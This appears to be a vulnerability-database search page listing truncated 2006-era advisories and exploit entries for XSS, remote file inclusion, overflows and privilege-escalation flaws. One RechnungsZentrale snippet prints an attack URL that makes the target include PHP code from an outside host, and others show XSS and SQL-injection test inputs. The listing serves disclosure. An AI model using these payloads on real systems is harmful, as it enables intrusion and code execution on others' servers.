8261 matches found
SOL6592 - Cross-Site Scripting vulnerability in the logon page
A cross-site scripting XSS vulnerability exists in the FirePass logon page. The affected FirePass logout URL fails to fully sanitize URL input before the web page content is sent to the browser. It is possible for an attacker to create web pages or emails with URLs that include executable code or...
JVN#99776858 Multiple vulnerabilities in Webmin and Usermin
Impact A remote attacker could conduct the followings: Steal Webmin and Usermin's configuration information Execute an arbitrary script on the user's web browser Possibly conduct a session hijack attack if session information from a cookie is leaked Solution Products Affected Webmin 1.290 and...
SquirrelMail 1.4.8 released - fixes variable overwriting attack
Hello all, Today SquirrelMail version 1.4.8 has been released with a collection of bugfixes and an important security fix. It was possible for an authenticated user to overwrite random variables in the compose.php script. This may open up possible attack vectors like reading or overwriting a user...
MIT Kerberos (krb5) krshd and v4rcp do not properly validate setuid() or seteuid() calls
Overview Privilege escalation vulnerabilities in MIT krb5 krshd and v4rcp may allow an authenticated attacker to execute arbitrary code. Description The MIT krb 5 krshd and v4rcp programs contain multiple privilege escalation vulnerabilities. MIT krb5 Security Advisory 2006-001 states that the...
DSA-1141-1 gnupg2 - integer overflow
Bulletin has no description...
JavaScript code can cause the browser attack-vulnerability warning-the black bar safety net
Security researchers have found a Use JavaScript to scan the family and the enterprise network, and attacks on the network server, and the router and printer and other equipment of the method. Researchers say the malicious JavaScript code can be embedded in a Web page, use the browser to browse t...
CVE-2006-3521
The CVE describes multiple cross-site scripting (XSS) vulnerabilities in SiteForge Collaborative Development Platform, specifically in index/siteforge-bugs-action/proj.siteforge, affecting version 1.0.4 and earlier. The issue arises from unescaped user-controlled input via the parameters _status,...
SOL5725 - pam_ldap password policy control vulnerability CAN-2005-2641
The pamldap authentication module may allow clients to authenticate with lower security ciphers than are normally required when the clients have been referred from another LDAP server. F5 Product Development tracked this issue as CR54024 and it was fixed in BIG-IP LTM 9.1.3 for the 9.1 software...
DSA-1094-1 gforge - missing input sanitising
Bulletin has no description...
XSS on LarkinWEB & Company
XSS Vulnerability On LarkinWEB Database Development, Web Site Design Marketing and Advertising System.. Runing HTML Codes, JScript etch... XSS Vulerability URL : http://www.larkinweb.com/secure/error.asp?msg=XSS Example:...
ASP database plug horse small conference-vulnerability warning-the black bar safety net
With the development of technology, ASP database plug horse also is not what fresh stuff, believe you played this. Oh, and that you have not met insert the asp code is spaces apart case? i.e. insertion of each of the characters between the There are spaces for? Now, let us to solve this problem...
W32Dasm buffer overflow vulnerability analysis and exploit-vulnerability warning-the black bar safety net
If you've seen the Black anti - “hack columnist”of the readers, all know the sentence is very classic words: with W32Dasm decompile need to crack the program, and then select the menu“references”-“string reference”, find“invalid registration code, please re-input!” Or“registration code is...
Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit
No description provided by source. / IHS Iran Homeland Security public source code Fenice - Open Media Streaming Server remote BOF exploit author : c0d3r "kaveh razavi" [email protected] package : fenice-1.10.tar.gz and prolly prior versions workaround : update after patch release advisory :...
RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
Exploit for unknown platform in category web applications ============================================================ RechnungsZentrale V2 = 1.1.3 Remote Inclusion Vulnerability ============================================================ - GroundZero Security Research and Software Development...
RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion
GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion: http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 SQL Injection: User: '...
RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
No description provided by source. - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion:...
RechnungsZentrale V2 1.1.3 - Remote File Inclusion
RechnungsZentrale V2 1.1.3 - Remote File Inclusion - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion:...
[Full-disclosure] RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
The Advisory can be found here: http://www.g-0.org/code/rz2-adv.html Regards, GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Ubermittlung unserer Daten fur Werbezwecke oder fur die Markt- oder Meinungsforschung § 28 Abs....
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in Azerbaijan Design & Development Group AZDG AzDGVote allow remote attackers to execute arbitrary PHP code via a URL in the intpath parameter in 1 vote.php, 2 view.php, 3 admin.php, and 4 admin/index.php...
CVE-2006-1770
Multiple PHP remote file inclusion vulnerabilities in Azerbaijan Design & Development Group AZDG AzDGVote allow remote attackers to execute arbitrary PHP code via a URL in the intpath parameter in 1 vote.php, 2 view.php, 3 admin.php, and 4 admin/index.php...